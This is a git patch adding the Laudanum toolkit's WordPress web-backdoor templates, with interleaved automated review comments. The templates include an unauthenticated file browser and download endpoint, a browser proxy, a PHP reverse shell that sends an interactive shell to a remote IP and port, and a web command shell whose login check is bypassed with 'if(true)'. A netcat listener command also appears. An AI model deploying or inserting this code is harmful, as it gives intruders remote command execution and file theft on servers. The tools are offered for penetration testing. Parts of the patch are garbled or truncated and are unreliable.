From a10dc295fd427ccc7cb1d3da8f4f5d8025d5a56e Mon Sep 17 00:00:00 2001
From: Adam Muntner ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '.Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+
+/* Initialize some variables we need again and again. */
+$query = isset($_POST['query']) ? $_POST['query'] : '';
+$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
+?>
+
+
+
+ DNS Query 0.1
+
+
+
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+
diff --git a/web-backdoors/wordpress/templates/file.php b/web-backdoors/wordpress/templates/file.php
new file mode 100644
index 0000000..d80a2ae
--- /dev/null
+++ b/web-backdoors/wordpress/templates/file.php
@@ -0,0 +1,182 @@
+
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file allows browsing of the file system.
+*** Written by Tim Medin Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+//set_error_handler('error_handler');
+
+
+/* Initialize some variables we need again and again. */
+$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
+$file = isset($_GET["file"]) ? $_GET["file"] : "";
+
+if ($file != "") {
+ if(file_exists($file)) {
+
+ $s = split("/", $file);
+ $filename = $s[count($s) - 1];
+ header("Content-type: application/x-download");
+ header("Content-Length: ".filesize($file));
+ header("Content-Disposition: attachment; filename=\"".$filename."\"");
+ readfile($file);
+ die();
+ }
+}
+?>
+
+
+
+ Laudanum File Browser 0.1
+Home
+
+Directory listing of / ";
+$breadcrumb = '/';
+foreach ($dirs as $d) {
+ if ($d != '') {
+ $breadcrumb .= $d . "/";
+ echo "$d/ ";
+ }
+}
+echo "";
+
+// translate .. to a real dir
+$parentdir = "";
+for ($i = 0; $i < count($dirs) - 2; $i++) {
+ $parentdir .= $dirs[$i] . "/";
+}
+
+echo "";
+echo "
+ ";
+echo "Name Date Size ";
+
+//get listing, separate into directories and files
+$listingfiles = array();
+$listingdirs = array();
+
+if ($handle = @opendir($curdir)) {
+ while ($o = readdir($handle)) {
+ if ($o == "." || $o == "..") continue;
+ if (@filetype($curdir . $o) == "dir") {
+ $listingdirs[] = $o . "/";
+ }
+ else {
+ $listingfiles[] = $o;
+ }
+ }
+
+ @natcasesort($listingdirs);
+ @natcasesort($listingfiles);
+
+ //display directories
+ foreach ($listingdirs as $f) {
+ echo "../ ";
+ }
+
+ //display files
+ foreach ($listingfiles as $f) {
+ echo "" . $f . " " . " ";
+ }
+}
+else {
+ echo "" . $f . " " . " " . number_format(@filesize($curdir . $f)) . " ";
+}
+?>
+Can't open directory
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
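Review bot: `$file` comes straight from `$_GET["file"]` and is passed to `file_exists()`, `filesize()` and `readfile()` with no access check visible before the download branch, although ipcheck.php in this same patch says it should be included by the other tools. The opening lines of this template did not survive extraction, so the include may already be there; if it is not, it belongs above the `$dir`/`$file` initialisers so that only the tester's address can reach the download path. This is also the only template in the patch with `//set_error_handler('error_handler');` commented out, which looks like a debugging leftover. Separately, `split()` no longer exists in PHP 7 and later; `$filename = basename($file);` replaces the two-line split, and the name should have `"` and control characters stripped before it is placed in the `Content-Disposition` header.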
diff --git a/web-backdoors/wordpress/templates/host.php b/web-backdoors/wordpress/templates/host.php
new file mode 100644
index 0000000..aff4ac3
--- /dev/null
+++ b/web-backdoors/wordpress/templates/host.php
@@ -0,0 +1,126 @@
+
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides a host lookup by ip address.
+*** Written by Jason Gillam Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+
+/* Initialize some variables we need again and again. */
+$query = isset($_POST['query']) ? $_POST['query'] : '';
+$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
+?>
+
+
+
+ Host Lookup 0.1
+
+
+
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+
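Review bot: `$type` is read from `$_POST['type']` with a `'DNS_ANY'` default, identical to the initialiser in the DNS query template earlier in this patch, but a lookup by IP address has no record type and nothing visible in this hunk uses the variable; it looks like a copy-paste leftover and can be dropped. `$query` is taken from POST unchanged, and since the header says the lookup is by IP address it should be validated first, e.g. `if (filter_var($query, FILTER_VALIDATE_IP) === false) { $query = ''; }`. Most of the template body did not survive extraction, so both points rest on the initialiser lines only.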
diff --git a/web-backdoors/wordpress/templates/ipcheck.php b/web-backdoors/wordpress/templates/ipcheck.php
new file mode 100644
index 0000000..fe27d70
--- /dev/null
+++ b/web-backdoors/wordpress/templates/ipcheck.php
@@ -0,0 +1,61 @@
+
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
+*** by someone other than the person who uploaded Laudanum. This file should be included
+*** in other Laudanum tools and not called directly.
+*** Written by Jason Gillam Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+
+
+?>
+
+
+
+ Kill nc 0.1
+
+
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+
diff --git a/web-backdoors/wordpress/templates/php-reverse-shell.php b/web-backdoors/wordpress/templates/php-reverse-shell.php
new file mode 100644
index 0000000..c2cf80d
--- /dev/null
+++ b/web-backdoors/wordpress/templates/php-reverse-shell.php
@@ -0,0 +1,194 @@
+ array("pipe", "r"), // stdin is a pipe that the child will read from
+ 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
+ 2 => array("pipe", "w") // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+ printit("ERROR: Can't spawn shell");
+ exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+ // Check for end of TCP connection
+ if (feof($sock)) {
+ printit("ERROR: Shell connection terminated");
+ break;
+ }
+
+ // Check for end of STDOUT
+ if (feof($pipes[1])) {
+ printit("ERROR: Shell process terminated");
+ break;
+ }
+
+ // Wait until a command is end down $sock, or some
+ // command output is available on STDOUT or STDERR
+ $read_a = array($sock, $pipes[1], $pipes[2]);
+ $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+ // If we can read from the TCP socket, send
+ // data to process's STDIN
+ if (in_array($sock, $read_a)) {
+ if ($debug) printit("SOCK READ");
+ $input = fread($sock, $chunk_size);
+ if ($debug) printit("SOCK: $input");
+ fwrite($pipes[0], $input);
+ }
+
+ // If we can read from the process's STDOUT
+ // send data down tcp connection
+ if (in_array($pipes[1], $read_a)) {
+ if ($debug) printit("STDOUT READ");
+ $input = fread($pipes[1], $chunk_size);
+ if ($debug) printit("STDOUT: $input");
+ fwrite($sock, $input);
+ }
+
+ // If we can read from the process's STDERR
+ // send data down tcp connection
+ if (in_array($pipes[2], $read_a)) {
+ if ($debug) printit("STDERR READ");
+ $input = fread($pipes[2], $chunk_size);
+ if ($debug) printit("STDERR: $input");
+ fwrite($sock, $input);
+ }
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+ if (!$daemon) {
+ print "$string\n";
+ }
+}
+
+?>
+
+
+
diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php
new file mode 100644
index 0000000..62d18f6
--- /dev/null
+++ b/web-backdoors/wordpress/templates/proxy.php
@@ -0,0 +1,336 @@
+
+***
+*** Copyright 2014 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file acts as a browser-based proxy.
+*** Written by Tim Medin Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+function geturlarray($u) {
+ // creates the url array, addes a scheme if it is missing and retries parsing
+ $o = parse_url($u);
+ if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
+ if (!isset($o["path"])) { $o["path"] = "/"; }
+ return $o;
+}
+
+function buildurl ($u) {
+ // build the url from the url array
+ // this is used because the built in function isn't
+ // avilable in all installs of php
+ if (!isset($u["host"])) { return null; }
+
+ $s = isset($u["scheme"]) ? $u["scheme"] : "http";
+ $s .= "://" . $u["host"];
+ $s .= isset($u["port"]) ? ":" . $u["port"] : "";
+ $s .= isset($u["path"]) ? $u["path"] : "/";
+ $s .= isset($u["query"]) ? "?" . $u["query"] : "";
+ $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
+ return $s;
+}
+
+function buildurlpath ($u) {
+ //gets the full url and attempts to remove the file at the end of the url
+ // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
+ if (!isset($u["host"])) { return null; }
+
+ $s = isset($u["scheme"])? $u["scheme"] : "http";
+ $s .= "://" . $u["host"];
+ $s .= isset($u["port"]) ? ":" . $u["port"] : "";
+
+ $path = isset($u["path"]) ? $u["path"] : "/";
+ // is the last portion of the path a file or a dir?
+ // assume if there is a . it is a file
+ // if it ends in a / then it is a dir
+ // if neither, than assume dir
+ $dirs = explode("/", $path);
+ $last = $dirs[count($dirs) - 1];
+ if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
+ // its a file, remove the last chunk
+ $path = substr($path, 0, -1 * strlen($last));
+ }
+
+ $s .= $path;
+ return $s;
+}
+
+function getfilename ($u) {
+ // returns the file name
+ // e.g. http://blah.com/dir/file.ext returns file.ext
+ // technically, it is the last portion of the url, so there is a potential
+ // for a problem if a http://blah.com/dir returns a file
+ $s = explode("/", $u["path"]);
+ return $s[count($s) - 1];
+}
+
+function getcontenttype ($headers) {
+ // gets the content type
+ foreach($headers as $h) {
+ if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
+ return $out[1][0];
+ }
+ }
+}
+
+function getcontentencoding ($headers) {
+ foreach ($headers as $h) {
+ if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
+ return $out[1][0];
+ }
+ }
+}
+
+function removeheader($header, $headers) {
+ foreach (array_keys($headers) as $key) {
+ if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
+ unset($headers[$key]);
+ return $headers;
+ }
+ }
+}
+
+function rewritecookies($headers) {
+ // removes the path and domain from cookies
+ for ($i = 0; $i < count($headers); $i++) {
+ if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
+ $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
+ $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
+ }
+ }
+ return $headers;
+}
+
+function getsessionid($headers) {
+ for ($i = 0; $i < count($headers); $i++) {
+ if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
+ return $out[1][0];
+ }
+ return "0";
+}
+
+function compatible_gzinflate($gzData) {
+ if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
+ $i = 10;
+ $flg = ord( substr($gzData, 3, 1) );
+ if ( $flg > 0 ) {
+ if ( $flg & 4 ) {
+ list($xlen) = unpack('v', substr($gzData, $i, 2) );
+ $i = $i + 2 + $xlen;
+ }
+ if ( $flg & 8 )
+ $i = strpos($gzData, "\0", $i) + 1;
+ if ( $flg & 16 )
+ $i = strpos($gzData, "\0", $i) + 1;
+ if ( $flg & 2 )
+ $i = $i + 2;
+ }
+ return @gzinflate( substr($gzData, $i, -8) );
+ } else {
+ return false;
+ }
+ return false;
+}
+
+function rewrite ($d, $u) {
+ $r = $d;
+ //rewrite images and links - absolute reference
+ $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
+ //rewrite images and links - hard linked
+ $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
+ //rewrite images and links - relative reference
+ $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
+
+
+ //rewrite form - absolute reference
+ $r = preg_replace("/(
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+
+
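Review bot: `removeheader()` returns `$headers` only from inside the loop, so when the named header is absent the function falls off the end and the caller receives null instead of the header list; add `return $headers;` after the `foreach`. The same function interpolates `$header` into the pattern unescaped, so it should be passed through `preg_quote($header, '/')` first. In `rewrite()`, `$_SERVER["PHP_SELF"]` is concatenated into the rewritten `src`/`href` values without escaping, so a request path containing markup ends up in the page shown to the operator; wrap it in `htmlspecialchars()`. `rewrite()` continues past what is visible in this hunk.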
diff --git a/web-backdoors/wordpress/templates/settings.php b/web-backdoors/wordpress/templates/settings.php
new file mode 100644
index 0000000..06f9817
--- /dev/null
+++ b/web-backdoors/wordpress/templates/settings.php
@@ -0,0 +1,67 @@
+
+*** Tim Medin Laudanum Tools
+
+
+ * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
+Fatal Error!
+
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net.
+
+
+
+');
+ }
+}
+
+// set_error_handler('wpl_error_handler');
+
+
+function logout() {
+ $_SESSION = array('authenticated' => false);
+ if (isset($_COOKIE[session_name()]))
+ setcookie(session_name(), '', time()-42000, '/');
+ session_destroy();
+}
+
+
+function wpl_stripslashes_deep($value) {
+ if (is_array($value))
+ return array_map('stripslashes_deep', $value);
+ else
+ return stripslashes($value);
+}
+
+if (get_magic_quotes_gpc())
+ $_POST = stripslashes_deep($_POST);
+
+/* Initialize some variables we need again and again. */
+//$username = isset($_POST['username']) ? $_POST['username'] : '';
+//$password = isset($_POST['password']) ? $_POST['password'] : '';
+//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
+
+$command = isset($_POST['command']) ? $_POST['command'] : '';
+$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
+$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
+
+
+///* Default settings --- these settings should always be set to something. */
+//$default_settings = array('home-directory' => '.');
+
+///* Merge settings. */
+//$ini['settings'] = array_merge($default_settings, $ini['settings']);
+
+
+session_start();
+
+/* Delete the session data if the user requested a logout. This leaves the
+ * session cookie at the user, but this is not important since we
+ * authenticates on $_SESSION['authenticated']. */
+if (isset($_POST['logout']))
+ logout();
+
+///* Attempt authentication. */
+//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
+// isset($ini['users'][$username])) {
+// if (strchr($ini['users'][$username], ':') === false) {
+// // No seperator found, assume this is a password in clear text.
+// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
+// } else {
+// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
+// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
+// }
+//}
+
+/* Attempt authentication. */
+if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
+ $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
+
+/* Enforce default non-authenticated state if the above code didn't set it
+ * already. */
+if (!isset($_SESSION['authenticated']))
+ $_SESSION['authenticated'] = false;
+
+if(true) {
+//if ($_SESSION['authenticated']) {
+ /* Initialize the session variables. */
+ if (empty($_SESSION['cwd'])) {
+ $_SESSION['cwd'] = '.';
+ $_SESSION['history'] = array();
+ $_SESSION['output'] = '';
+ }
+
+ if (!empty($command)) {
+ /* Save the command for late use in the JavaScript. If the command is
+ * already in the history, then the old entry is removed before the
+ * new entry is put into the list at the front. */
+ if (($i = array_search($command, $_SESSION['history'])) !== false)
+ unset($_SESSION['history'][$i]);
+
+ array_unshift($_SESSION['history'], $command);
+
+ /* Now append the commmand to the output. */
+ $_SESSION['output'] .= '$ ' . $command . "\n";
+
+ /* Initialize the current working directory. */
+ if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
+ $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
+ } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
+ /* The current command is a 'cd' command which we have to handle
+ * as an internal shell command. */
+
+ if ($regs[1]{0} == '/') {
+ /* Absolute path, we use it unchanged. */
+ $new_dir = $regs[1];
+ } else {
+ /* Relative path, we append it to the current working
+ * directory. */
+ $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+ }
+
+ /* Transform '/./' into '/' */
+ while (strpos($new_dir, '/./') !== false)
+ $new_dir = str_replace('/./', '/', $new_dir);
+
+ /* Transform '//' into '/' */
+ while (strpos($new_dir, '//') !== false)
+ $new_dir = str_replace('//', '/', $new_dir);
+
+ /* Transform 'x/..' into '' */
+ while (preg_match('|/\.\.(?!\.)|', $new_dir))
+ $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+
+ if ($new_dir == '') $new_dir = '/';
+
+ /* Try to change directory. */
+ if (@chdir($new_dir)) {
+ $_SESSION['cwd'] = $new_dir;
+ } else {
+ $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+ }
+
+ } elseif (trim($command) == 'exit') {
+ logout();
+ } else {
+
+ /* The command is not an internal command, so we execute it after
+ * changing the directory and save the output. */
+ chdir($_SESSION['cwd']);
+
+ // We canot use putenv() in safe mode.
+ if (!ini_get('safe_mode')) {
+ // Advice programs (ls for example) of the terminal size.
+ putenv('ROWS=' . $rows);
+ putenv('COLUMNS=' . $columns);
+ }
+
+ /* Alias expansion. */
+ $length = strcspn($command, " \t");
+ $token = substr($command, 0, $length);
+ if (isset($ini['aliases'][$token]))
+ $command = $ini['aliases'][$token] . substr($command, $length);
+
+ $io = array();
+ $p = proc_open($command,
+ array(1 => array('pipe', 'w'),
+ 2 => array('pipe', 'w')),
+ $io);
+
+ /* Read output sent to stdout. */
+ while (!feof($io[1])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+ ENT_COMPAT, 'UTF-8');
+ }
+ /* Read output sent to stderr. */
+ while (!feof($io[2])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+ ENT_COMPAT, 'UTF-8');
+ }
+
+ fclose($io[1]);
+ fclose($io[2]);
+ proc_close($p);
+ }
+ }
+
+ /* Build the command history for use in the JavaScript */
+ if (empty($_SESSION['history'])) {
+ $js_command_hist = '""';
+ } else {
+ $escaped = array_map('addslashes', $_SESSION['history']);
+ $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+ }
+}
+
+?>
+
+
+
+ Laudanum Shell
+
+
Please login:
\n"; + ?> + +Username:
+ +Password:
+ + + + + + + + + + + + + + + + +
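Review bot: The command-execution block is gated by `if(true) {`, with the real check `//if ($_SESSION['authenticated']) {` commented out directly below it, so `$_POST['command']` reaches `proc_open()` for any client that can request the page, logged in or not. Restore `if ($_SESSION['authenticated']) {` before this is placed on a host. The authentication test above it reads `$nounce`, `$username`, `$password` and `$users`, but the three `$_POST` initialisers are commented out and `$users` is not defined in the visible lines, so it cannot succeed as written; the assignments need to come back, and the comparison is better written as `hash_equals($users[$username], hash('sha1', $password))` than with `==`. `wpl_stripslashes_deep()` recurses into, and is called as, `stripslashes_deep`, which only resolves if something else defines that name. The hunk header gives 67 lines and the tail is collapsed, so part of this file is not visible here.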